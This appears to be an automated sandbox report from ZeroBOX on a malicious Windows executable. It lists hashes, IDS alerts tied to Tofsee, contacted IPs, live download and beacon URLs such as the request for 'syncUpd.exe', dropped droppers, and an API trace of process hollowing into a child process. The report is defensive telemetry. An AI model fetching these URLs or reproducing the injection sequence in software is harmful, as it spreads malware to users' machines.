Summary | ZeroBOX

288c47bbc1871b42239df19ff4df68f076.exe

Generic Malware NSIS Malicious Library Malicious Packer Admin Tool (Sysinternals etc ...) Antivirus UPX Anti_VM AntiDebug PNG Format OS Processor Check MZP Format CHM Format .NET EXE JPEG Format PE64 PE File DLL ZIP Format BMP Format AntiVM icon PE32
Category Machine Started Completed
FILE s1_win7_x6403_us Dec. 26, 2023, 7:53 a.m. Dec. 26, 2023, 8 a.m.
Size 6.8MB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 3954cc01c26d1962284f3b95602f2367
SHA256 8c887835f3b1861776b4d88a9c47dbe945dcadfd881b4ae9909488c022924cf6
CRC32 E4A79FB3
ssdeep 196608:tvt0kQnhCtKZSqNcg7xAtipQrBiS9cWzAY5do:trmhCfqNDtAtUQdiS9cWzDK
Yara
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)

IP Address Status Action
104.21.76.57 Active Moloch
164.124.101.2 Active Moloch
185.85.15.47 Active Moloch
192.0.66.233 Active Moloch
209.87.209.205 Active Moloch
5.42.64.35 Active Moloch
64.185.227.156 Active Moloch
91.92.254.7 Active Moloch

Suricata Alerts

Flow SID Signature Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
UDP 192.168.56.103:52760 -> 8.8.8.8:53 2047702 ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup Misc activity
TCP 192.168.56.103:49173 -> 5.42.64.35:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 5.42.64.35:80 2016141 ET INFO Executable Download from dotted-quad Host Potentially Bad Traffic
TCP 5.42.64.35:80 -> 192.168.56.103:49173 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 5.42.64.35:80 -> 192.168.56.103:49173 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.103:49170 -> 91.92.254.7:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 164.124.101.2:53 2047719 ET INFO External IP Lookup Domain (iplogger .com in DNS lookup) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49168 -> 64.185.227.156:80 2029622 ET POLICY External IP Lookup (ipify .org) Potential Corporate Privacy Violation
TCP 192.168.56.103:49168 -> 64.185.227.156:80 2011227 ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla)) Potentially Bad Traffic
TCP 192.0.66.233:443 -> 192.168.56.103:49200 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49198 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49187 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49186 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49191 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49199 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49194 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49195 -> 192.0.66.233:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49176 -> 104.21.76.57:443 2047718 ET INFO External IP Lookup Domain (iplogger .com in TLS SNI) Device Retrieving External IP Address Detected
TCP 192.168.56.103:49176 -> 104.21.76.57:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49178 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.85.15.47:443 -> 192.168.56.103:49188 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 185.85.15.47:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.85.15.47:443 -> 192.168.56.103:49192 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.0.66.233:443 -> 192.168.56.103:49196 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49177 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49182 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49181 -> 209.87.209.205:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49176
104.21.76.57:443
C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 CN=iplogger.com c1:91:92:9b:9a:80:29:75:dc:65:9b:a4:c0:11:8c:ac:72:d6:77:58

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
suspicious_features Connection to IP address suspicious_request GET http://5.42.64.35/syncUpd.exe
request GET http://api.ipify.org/?format=dfg
request GET http://91.92.254.7/scripts/plus.php?ip=175.208.134.152&substr=nine&s=ab
request GET http://5.42.64.35/syncUpd.exe
request GET https://iplogger.com/19nVA4
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 458752
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00240000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00270000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1704
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f32000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 524288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00440000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00480000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00415000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0041b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00417000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003fc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00650000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1704
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4161536
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02910000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2096
region_size: 9351168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02d10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 36864
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x008ac000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2192
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00330000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2260
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00380000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2512
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 86016
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0092c000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2512
region_size: 114688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x003a0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9914630144
free_bytes_available: 9914630144
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 9936683008
free_bytes_available: 9936683008
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021916672
free_bytes_available: 10021916672
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0

GetDiskFreeSpaceExW

total_number_of_free_bytes: 10021965824
free_bytes_available: 10021965824
root_path: C:
total_number_of_bytes: 34252779520
1 1 0
domain api.ipify.org
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
file C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
file C:\Users\test22\AppData\Local\Temp\toolspub2.exe
file C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file C:\Users\test22\AppData\Local\Temp\nstC783.tmp\INetC.dll
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b42239df19ff4df68f076.exe
file C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUPUI.DLL
file C:\Users\test22\AppData\Local\Temp\Setup00000994\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUP.DLL
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\Setup00000994\ose00000.exe
file C:\Users\test22\AppData\Local\Temp\Setup000023ac\OSETUPUI.DLL
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: (raw bytes of the downloaded PE image, omitted)
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x006bfe00', u'virtual_address': u'0x00002000', u'entropy': 7.983594764372087, u'name': u'.text', u'virtual_size': u'0x006bfdb4'} entropy 7.98359476437 description A section with a high entropy has been found
entropy 0.999710710928 description Overall entropy of this PE file is high
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
host 5.42.64.35
host 91.92.254.7
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2364
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000084
1 0 0
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
Time & API Arguments Status Return Repeated

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0

LdrGetDllHandle

module_name: snxhk
module_address: 0x00000000
stack_pivoted: 0
3221225781 0
file C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2364
process_handle: 0x00000084
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 2192 called NtSetContextThread to modify thread in remote process 2364
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000080
process_identifier: 2364
1 0 0
file C:\Windows\Prefetch\PYTHON.EXE-C663CFDC.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-305B5E54.pf
file C:\Windows\Prefetch\AUDIODG.EXE-BDFD3029.pf
file C:\Windows\Prefetch\THUNDERBIRD.EXE-A0DA674F.pf
file C:\Windows\Prefetch\DLLHOST.EXE-4F28A26F.pf
file c:\Windows\Temp\fwtsqmfile01.sqm
file C:\Windows\Prefetch\SVCHOST.EXE-7AC6742A.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-D0E66F4A.pf
file C:\Windows\Prefetch\86.0.4240.111_CHROME_INSTALLE-AF26656A.pf
file C:\Windows\Prefetch\CMD.EXE-4A81B364.pf
file C:\Windows\Prefetch\CSC.EXE-BE9AC2DF.pf
file c:\Windows\Temp\fwtsqmfile00.sqm
file C:\Windows\Prefetch\MSCORSVW.EXE-57D17DAF.pf
file C:\Windows\Prefetch\SOFTWARE_REPORTER_TOOL.EXE-EB18F4FF.pf
file C:\Users\test22\AppData\Local\Temp\~DF8C0F100C7231519A.TMP
file C:\Windows\Prefetch\IEXPLORE.EXE-908C99F8.pf
file C:\Windows\Prefetch\DLLHOST.EXE-5E46FA0D.pf
file C:\Windows\Prefetch\SLUI.EXE-724E99D9.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-1304AE86.pf
file C:\Windows\Prefetch\PING.EXE-7E94E73E.pf
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-C3A1B497.pf
file C:\Windows\Prefetch\IEXPLORE.EXE-4B6C9213.pf
file C:\Windows\Prefetch\WMIPRVSE.EXE-1628051C.pf
file C:\Windows\Prefetch\DEFRAG.EXE-588F90AD.pf
file C:\Windows\Prefetch\CHROME.EXE-D999B1BA.pf
file C:\Windows\Prefetch\IMKRMIG.EXE-AAA206C5.pf
file C:\Windows\Prefetch\UNPACK200.EXE-E4DF1A4E.pf
file C:\Windows\Prefetch\DLLHOST.EXE-40DD444D.pf
file C:\Windows\Prefetch\7ZFM.EXE-22E64FB8.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-B0D5C571.pf
file C:\Windows\Prefetch\GOOGLEUPDATESETUP.EXE-34B7EAE8.pf
file C:\Windows\Prefetch\SVCHOST.EXE-E1E0ACE0.pf
file C:\Windows\Prefetch\LOGONUI.EXE-09140401.pf
file C:\Windows\Prefetch\AgGlFgAppHistory.db
file C:\Windows\Prefetch\JAVAW.EXE-D0AA8787.pf
file C:\Windows\Prefetch\SSVAGENT.EXE-0CD059B7.pf
file C:\Windows\Prefetch\AgGlUAD_P_S-1-5-21-3832866432-4053218753-3017428901-1001.db
file C:\Windows\Prefetch\OSE.EXE-2B23CA4C.pf
file C:\Windows\Prefetch\INSTALLER.EXE-60163557.pf
file C:\Windows\Prefetch\PINGSENDER.EXE-8E79128B.pf
file C:\Windows\Prefetch\MSCORSVW.EXE-C3C515BD.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-5A853E81.pf
file C:\Windows\Prefetch\AgRobust.db
file C:\Windows\Prefetch\ICACLS.EXE-B19DE1F7.pf
file C:\Windows\Prefetch\IMEKLMG.EXE-3FEB7CC0.pf
file C:\Windows\Prefetch\GOOGLEUPDATECOMREGISTERSHELL6-BB6760AF.pf
file C:\Windows\Prefetch\NOTEPAD.EXE-D8414F97.pf
file C:\Windows\Prefetch\7ZG.EXE-0F8C4081.pf
file C:\Windows\Prefetch\CMD.EXE-AC113AA8.pf
file C:\Windows\Prefetch\AgGlGlobalHistory.db
file C:\Users\test22\AppData\Local\Temp\SetupExe(20200504224110B04).log
file C:\Windows\Prefetch\SNIPPINGTOOL.EXE-EFFDAFDE.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\1F4WQUHZ\dropbox_logo_text_2015-vfld7_dJ8[1].svg
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\override[1].css
file C:\Windows\Prefetch\SVCHOST.EXE-80F4A784.pf
file C:\Users\test22\AppData\Local\Temp\dd_vcredist_amd64_20180201144548_000_vcRuntimeMinimum_x64.log
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\desktop.ini
file C:\Users\test22\AppData\Local\Temp\{E7573238-1B24-467B-B5A4-0BE967E0BF64}.tmp
file C:\Windows\Prefetch\CONTROL.EXE-817F8F1D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\U06NAGU2\mnrstrtr[1].js
file C:\Windows\Prefetch\MSCORSVW.EXE-90526FAC.pf
file C:\Users\test22\AppData\Local\Temp\IME2010imeklmg00000026.log
file C:\Windows\Prefetch\CVTRES.EXE-2B9D810D.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\SOC-Facebook[1].png
file C:\Windows\Prefetch\RUNDLL32.EXE-8C11D845.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\f[2].txt
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\keys_js5[2].htm
file C:\Windows\Prefetch\WERMGR.EXE-0F2AC88C.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-4366A668.pf
file C:\Windows\Prefetch\RUNDLL32.EXE-87432CEE.pf
file C:\Windows\Prefetch\AgAppLaunch.db
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\syncUpd[1].exe
file C:\Users\test22\AppData\Local\Temp\SetupExe(20180405152131B24).log
file c:\Windows\Temp\TS_7FC6.tmp
file C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\AdPostInjectAsync[1].nhn
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\ipsec[4].htm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\invalidcert[1]
file C:\Windows\Prefetch\DLLHOST.EXE-97F6A314.pf
file C:\Users\test22\AppData\Local\Temp\UserInfoSetup(201804051522349E8).log
file c:\Windows\Temp\TS_88E1.tmp
file C:\Users\test22\AppData\Local\Temp\RD25B7.tmp
file C:\Windows\Prefetch\JAVAWS.EXE-FE17358E.pf
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\TopNav[1].js
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\554576[1].htm
file C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VKMIWH9C\getLoginStatus[2].nhn
file C:\Windows\Prefetch\ELEVATION_SERVICE.EXE-9F359A74.pf
file C:\Users\test22\AppData\Local\Temp\288c47bbc1871b42239df19ff4df68f076.exe
file C:\Windows\Prefetch\GOOGLEUPDATE.EXE-B95715F5.pf
Process injection Process 2192 resumed a thread in remote process 2364
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000080
suspend_count: 1
process_identifier: 2364
1 0 0
file C:\Windows\Prefetch\VBOXDRVINST.EXE-7DCD6070.pf
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

thread_handle: 0x0000020c
suspend_count: 1
process_identifier: 1704
1 0 0

NtResumeThread

thread_handle: 0x00000220
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

thread_identifier: 2100
thread_handle: 0x000003b0
process_identifier: 2096
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003b8
1 1 0

NtResumeThread

thread_handle: 0x00000358
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

thread_identifier: 2144
thread_handle: 0x000003b8
process_identifier: 2140
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\InstallSetup9.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003d0
1 1 0

NtResumeThread

thread_handle: 0x000003a4
suspend_count: 1
process_identifier: 1704
1 0 0

CreateProcessInternalW

thread_identifier: 2196
thread_handle: 0x000003c0
process_identifier: 2192
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000003e8
1 1 0

CreateProcessInternalW

thread_identifier: 2264
thread_handle: 0x000001ec
process_identifier: 2260
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x000001f0
1 1 0

CreateProcessInternalW

thread_identifier: 2516
thread_handle: 0x000001e0
process_identifier: 2512
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\nsqD995.tmp.exe
filepath_r:
stack_pivoted: 0
creation_flags: 67108864 (CREATE_DEFAULT_ERROR_MODE)
inherit_handles: 0
process_handle: 0x000001e4
1 1 0

CreateProcessInternalW

thread_identifier: 2368
thread_handle: 0x00000080
process_identifier: 2364
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\toolspub2.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\toolspub2.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000084
1 1 0

NtGetContextThread

thread_handle: 0x00000080
1 0 0

NtUnmapViewOfSection

base_address: 0x00400000
region_size: 4096
process_identifier: 2364
process_handle: 0x00000084
1 0 0

NtAllocateVirtualMemory

process_identifier: 2364
region_size: 36864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000084
1 0 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2364
process_handle: 0x00000084
1 1 0

NtSetContextThread

registers.eip: 2005598660
registers.esp: 1638384
registers.edi: 0
registers.eax: 4206040
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000080
process_identifier: 2364
1 0 0

NtResumeThread

thread_handle: 0x00000080
suspend_count: 1
process_identifier: 2364
1 0 0

NtResumeThread

thread_handle: 0x000002fc
suspend_count: 1
process_identifier: 2260
1 0 0

NtResumeThread

thread_handle: 0x00000310
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

NtResumeThread

thread_handle: 0x0000013c
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0

NtResumeThread

thread_handle: 0x0000024c
suspend_count: 1
process_identifier: 2260
1 0 0

CreateProcessInternalW

thread_identifier: 0
thread_handle: 0x00000000
process_identifier: 0
current_directory:
filepath:
track: 0
command_line: c
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 0
process_handle: 0x00000000
0 0